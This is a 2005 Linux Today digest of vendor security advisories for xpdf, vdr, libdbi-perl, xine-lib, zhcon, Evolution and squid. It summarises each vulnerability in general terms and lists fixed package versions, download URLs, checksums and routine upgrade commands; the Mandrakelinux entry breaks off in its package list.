dcsimg
Linux Today: Linux News On Internet Time.




More on LinuxToday


Security Digest: January 25, 2005

Jan 26, 2005, 04:45 (0 Talkback[s])

Conectiva Linux


CONECTIVA LINUX SECURITY ANNOUNCEMENT

PACKAGE : xpdf
SUMMARY : Fixes for xpdf vulnerabilities
DATE : 2005-01-25 13:50:00
ID : CLA-2005:921
RELEVANT RELEASES : 9, 10


DESCRIPTION
xpdf[1] is a viewer for Portable Document Format (PDF) files, whose code was used by many other projects, like gpdf, cups and tetex.

iDefense noticed[2] other two issues[3,4] in the xpdf code where two buffer overflows could lead to remote code execution vulnerabilities.

SOLUTION
It is recommended that all xpdf, gpdf, cups and/or tetex users upgrade their packages.

REFERENCES
1.http://www.foolabs.com/xpdf
2.http://http://www.idefense.com/application/poi/display?id=172&type=vulnerabilities
3.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1125
4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0064

UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/10/SRPMS/cups-1.1.20-62425U10_8cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/gpdf-0.131-56565U10_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/xpdf-3.00-48231U10_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/SRPMS/tetex-2.0.2-47988U10_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-devel-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-devel-static-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-doc-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-foomatic-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-libs-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-netatalk-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-netware-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-ppd-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cups-serial-1.1.20-62425U10_8cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-am-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ar-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-az-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-be-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-bn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ca-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-cs-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-cy-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-da-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-de-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-el-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-en_CA-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-en_GB-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-eo-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-es-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-eu-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-fr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ga-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-gl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-he-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-hu-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-id-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-is-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-it-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ja-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-kn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ko-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-lt-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-lv-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-mk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ml-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-mn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ms-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-nl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-nn-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-no-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pt-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-pt_BR-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ro-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ru-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sl-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sq-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-sv-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-ta-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-th-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-tr-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-uk-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-vi-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-wa-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-zh_CN-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/gpdf-i18n-zh_TW-0.131-56565U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/xpdf-3.00-48231U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/xpdf-progs-3.00-48231U10_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-afm-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-devel-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-doc-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-dvilj-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-dvips-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-latex-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/tetex-xdvi-2.0.2-47988U10_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cups-1.1.18-29091U90_7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/xpdf-2.01-22930U90_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-devel-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-devel-static-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-doc-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cups-libs-1.1.18-29091U90_7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/xpdf-2.01-22930U90_4cl.i386.rpm

ADDITIONAL INSTRUCTIONS
The apt tool can be used to perform RPM packages upgrades:

  • run: apt-get update
  • after that, execute: apt-get upgrade

Detailed instructions regarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at
http://distro.conectiva.com.br/seguranca/chave/?idioma=en Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en
Copyright (c) 2004 Conectiva Inc.
http://www.conectiva.com

Debian GNU/Linux


Debian Security Advisory DSA 656-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : vdr
Vulnerability : insecure file access
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2005-0071

Javier Fernãndez-Sanguino Peña from the Debian Security Audit Team has discovered that the vdr daemon which is used for video disk recorders for DVB cards can overwrite arbitrary files.

For the stable distribution (woody) this problem has been fixed in version 1.0.0-1woody2.

For the unstable distribution (sid) this problem has been fixed in version 1.2.6-6.

We recommend that you upgrade your vdr package.

Upgrade Instructions


wget url

will fetch the file for you
dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update

will update the internal database apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2.dsc
Size/MD5 checksum: 580 b948b3b68a18e5f909dd9479a9841f8a
http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2.tar.gz
Size/MD5 checksum: 431964 3e2a7e792b21258a56bfb54ff7aee702

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/v/vdr/vdr_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 68802 a881e0f34fdf75cbb9444221412f29e3
http://security.debian.org/pool/updates/main/v/vdr/vdr-daemon_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 151954 a43a1eba9ed48ca81f4953cc2bb17236
http://security.debian.org/pool/updates/main/v/vdr/vdr-kbd_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 152562 37f7d263a57337e6a5087944e15e9f46
http://security.debian.org/pool/updates/main/v/vdr/vdr-lirc_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 153020 1b08452b0cb57abe74024521fbca4c32
http://security.debian.org/pool/updates/main/v/vdr/vdr-rcu_1.0.0-1woody2_i386.deb
Size/MD5 checksum: 154642 b0f7570129a1cd8c0594258750207cba

These files will probably be moved into the stable distribution on its next update.

-



Debian Security Advisory DSA 658-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : libdbi-perl
Vulnerability : insecure temporary file
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2005-0077

Javier Fernãndez-Sanguino Peña from the Debian Security Audit Project discovered that the DBI library, the Perl5 database interface, creates a tmporary PID file in an insecure manner. This can be exploited by a malicious user to overwrite arbitrary files owned by the person executing the parts of the library.

For the stable distribution (woody) this problem has been fixed in version 1.21-2woody2.

For the unstable distribution (sid) this problem has been fixed in version 1.46-6.

We recommend that you upgrade your libdbi-perl package.

Upgrade Instructions


wget url

will fetch the file for you
dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update

will update the internal database apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2.dsc
Size/MD5 checksum: 587 778cd2081c6c996e962e5ccd6100b1e8
http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2.diff.gz
Size/MD5 checksum: 12117 b96cca05e51fcab8c6ca55c00644d3fd
http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21.orig.tar.gz
Size/MD5 checksum: 208384 c781eee2559de5e4a72e28a8120cb1d9

Alpha architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_alpha.deb
Size/MD5 checksum: 345058 014d047dbb24fd94d1a1437244644cd8

ARM architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_arm.deb
Size/MD5 checksum: 342540 896f3fe01eb1702df395c8f4ea3b6877

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_i386.deb
Size/MD5 checksum: 337802 82348c4c37c6636b85b5fa18d5e00f66

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_ia64.deb
Size/MD5 checksum: 356854 b800c42bcdbd3fef74ab630f1a066682

HP Precision architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_hppa.deb
Size/MD5 checksum: 345808 5cebb7436af6e22050de51ea895a62ed

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_m68k.deb
Size/MD5 checksum: 338592 202c8161fcdb618b6fbe236499d560af

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_mips.deb
Size/MD5 checksum: 338102 3689ef5cf728e7108206cd9140f682bc

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_mipsel.deb
Size/MD5 checksum: 338494 bd6f8206898feb05d613f06e30b78e5b

PowerPC architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_powerpc.deb
Size/MD5 checksum: 342782 dd2b2637b3c15d472c5053c586a99e1d

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_s390.deb
Size/MD5 checksum: 340908 274999cd7e3758367fef5f39fa44e888

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/libd/libdbi-perl/libdbi-perl_1.21-2woody2_sparc.deb
Size/MD5 checksum: 344732 5bf3bb91f4a0de5af59d6a2a7d70cecf

These files will probably be moved into the stable distribution on its next update.



Debian Security Advisory DSA 657-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : xine-lib
Vulnerability : buffer overflow
Problem-Type : local (remote)
Debian-specific: no
CVE ID : CAN-2004-1379
BugTraq ID : 11205

A heap overflow has been discovered in the DVD subpicture decoder of xine-lib. An attacker could cause arbitrary code to be executed on the victims host by supplying a malicious MPEG. By tricking users to view a malicious network stream, this is remotely exploitable.

For the stable distribution (woody) this problem has been fixed in version 0.9.8-2woody2.

For the unstable distribution (sid) this problem has been fixed in version 1-rc6a-1.

We recommend that you upgrade your libxine packages.

Upgrade Instructions


wget url

will fetch the file for you
dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update

will update the internal database apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody3.dsc
Size/MD5 checksum: 760 fdead2b906645e98cd98482da245f9fe
http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody3.diff.gz
Size/MD5 checksum: 1432 d1228b2ea29024dc31d7e73716e430b8
http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8.orig.tar.gz
Size/MD5 checksum: 1766178 d8fc9b30e15b50af8ab7552bbda7aeda

Alpha architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_alpha.deb
Size/MD5 checksum: 260790 35b1fcb3d630159bffba57cd03ee7198
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_alpha.deb
Size/MD5 checksum: 815898 5b969f8b91cd217a62fbe1206e0dae22

ARM architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_arm.deb
Size/MD5 checksum: 302736 503e7f984fcdc022730ae84bda3d7893
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_arm.deb
Size/MD5 checksum: 671030 3ca1bdc2e19e8547593ec227457bf934

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_i386.deb
Size/MD5 checksum: 261202 4fa616c95b299f01eb6c4d3984696a97
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_i386.deb
Size/MD5 checksum: 807774 2880560bd06ebf751184bd8cb0345974

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_ia64.deb
Size/MD5 checksum: 260670 474f66c0a7ffdd1f1728ca22a05556f3
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_ia64.deb
Size/MD5 checksum: 953146 001f5e510918a2b1cb52e2d560094224

HP Precision architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_hppa.deb
Size/MD5 checksum: 260840 af3ab8871f26ec99c2e5a4c67821415c
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_hppa.deb
Size/MD5 checksum: 846422 cf09d101cec9e33e4074e6d9e5e7868a

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_m68k.deb
Size/MD5 checksum: 292502 ba71fa3ee20e67e92e4ecfab2028f12b
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_m68k.deb
Size/MD5 checksum: 617432 68fd34079a32e9881f095c7ccc458822

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_mips.deb
Size/MD5 checksum: 299528 feca6217a5df51fe46d1e5185a36c0f4
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_mips.deb
Size/MD5 checksum: 652674 80f688f5856c786f2432619491ac5b56

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_mipsel.deb
Size/MD5 checksum: 299564 5c2165f1adad2172acfddb42b2be92d1
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_mipsel.deb
Size/MD5 checksum: 654450 4937401c8ea1d16ebfabf83b9321cc4e

PowerPC architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_powerpc.deb
Size/MD5 checksum: 261054 9345084069863c90f69d17d4cd55e31d
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_powerpc.deb
Size/MD5 checksum: 742158 7fd5ef486125947c8418ca95b803df8f

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_s390.deb
Size/MD5 checksum: 302236 c539ecfcf4a0dfd19b4637fc93f558b9
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_s390.deb
Size/MD5 checksum: 662496 2d6aede160abfc88f5cf5e7f2e19014a

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody3_sparc.deb
Size/MD5 checksum: 260942 db51371b3aad43f02fead312971c8150
http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody3_sparc.deb
Size/MD5 checksum: 807478 2f4c13dab590a77d3f57aa923617bc8c

These files will probably be moved into the stable distribution on its next update.



Debian Security Advisory DSA 655-1 security@debian.org
http://www.debian.org/security/ Martin Schulze
January 25th, 2005 http://www.debian.org/security/faq


Package : zhcon
Vulnerability : missing privilege release
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2005-0072

Erik Sjalund discovered that zhcon, a fast console CJK system using the Linux framebuffer, accesses a user-controlled configuration file with elevated privileges. Thus, it is possible to read arbitrary files.

For the stable distribution (woody) this problem has been fixed in version 0.2-4woody3.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your zhcon package.

Upgrade Instructions


wget url

will fetch the file for you
dpkg -i file.deb

will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update

will update the internal database apt-get upgrade

will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3.dsc
Size/MD5 checksum: 571 cef550eb0e12c8841fb19dec63b57c18
http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3.diff.gz
Size/MD5 checksum: 18162 5757142ee30a5d3e990180a44bfbf8cd
http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2.orig.tar.gz
Size/MD5 checksum: 4727022 7a15d08e903c0d40f1f659b23185c4c0

Alpha architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_alpha.deb
Size/MD5 checksum: 4577314 574567f7d5ff0c730d7c8403da284d62

ARM architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_arm.deb
Size/MD5 checksum: 4566364 e9cc7274596bd612b85b832945d4fedc

Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_i386.deb
Size/MD5 checksum: 4549436 adcaa080b69de7c3d7de5d5c58bd2ee6

Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_ia64.deb
Size/MD5 checksum: 4594976 ff8e34b0df2d5548918698972ae71ac4

HP Precision architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_hppa.deb
Size/MD5 checksum: 4590474 68576eb8887b9bda98afc3548704d491

Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_m68k.deb
Size/MD5 checksum: 4545894 419dcce4d28053e9527888f064dd9a9d

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_mips.deb
Size/MD5 checksum: 4557002 70955d5fd0205214a4add453ebda3c9c

Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_mipsel.deb
Size/MD5 checksum: 4555974 81e127f1ebecb1519ccc08472909a6cc

PowerPC architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_powerpc.deb
Size/MD5 checksum: 4548730 7d99eb0b961e83cf9067355c39ba656b

IBM S/390 architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_s390.deb
Size/MD5 checksum: 4544774 172e282c5c27a5d12a2e3b709b7e89c2

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/z/zhcon/zhcon_0.2-4woody3_sparc.deb
Size/MD5 checksum: 4546018 f6d5b53efb642de658498c091884ff7e

These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Gentoo Linux


Gentoo Linux Security Advisory GLSA 200501-35

http://security.gentoo.org/


Severity: High
Title: Evolution: Integer overflow in camel-lock-helper
Date: January 24, 2005
Bugs: #79183
ID: 200501-35


Synopsis

An overflow in the camel-lock-helper application can be exploited by an attacker to execute arbitrary code with elevated privileges.

Background

Evolution is a GNOME groupware application similar to Microsoft Outlook.

Affected packages


     Package                /  Vulnerable  /                Unaffected

  1  mail-client/evolution      <= 2.0.2                   >= 2.0.2-r1

Description

Max Vozeler discovered an integer overflow in the camel-lock-helper application, which is installed as setgid mail by default.

Impact

A local attacker could exploit this vulnerability to execute malicious code with the privileges of the 'mail' group. A remote attacker could also setup a malicious POP server to execute arbitrary code when an Evolution user connects to it.

Workaround

There is no known workaround at this time.

Resolution

All Evolution users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose
    # ">=mail-client/evolution-2.0.2-r1"

References

[ 1 ] CAN-2005-0102

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0102

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-35.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


Mandrakelinux

Mandrakelinux Security Update Advisory


Package name: squid
Advisory ID: MDKSA-2005:014
Date: January 24th, 2005
Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1, Corporate Server 3.0


Problem Description:

"infamous41md" discovered two vulnerabilities in the squid proxy cache server. The first is a buffer overflow in the Gopher response parser which leads to memory corruption and would usually crash squid (CAN-2005-0094). The second is an integer overflow in the receiver of WCCP (Web Cache Communication Protocol) messages. An attacker could send a specially crafted UDP datagram that would cause squid to crash (CAN-2005-0095).

The updated packages have been patched to prevent these problems.


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0095
http://www.squid-cache.org/Advisories/SQUID-2005_1.txt
http://www.squid-cache.org/Advisories/SQUID-2005_2.txt


Updated Packages:

Mandrakelinux 10.0:
829a39d43e630ea5723714a6914fb714 10.0/RPMS/squid-2.5.STABLE4-2.3.100mdk.i586.rpm
c2cb0554ab7225eef74bef946ffe359d 10.0/SRPMS/squid-2.5.STABLE4-2.3.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
